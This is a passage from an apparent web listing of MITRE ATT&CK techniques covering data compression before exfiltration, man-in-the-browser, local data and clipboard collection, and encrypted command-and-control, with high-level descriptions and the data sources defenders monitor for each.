Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre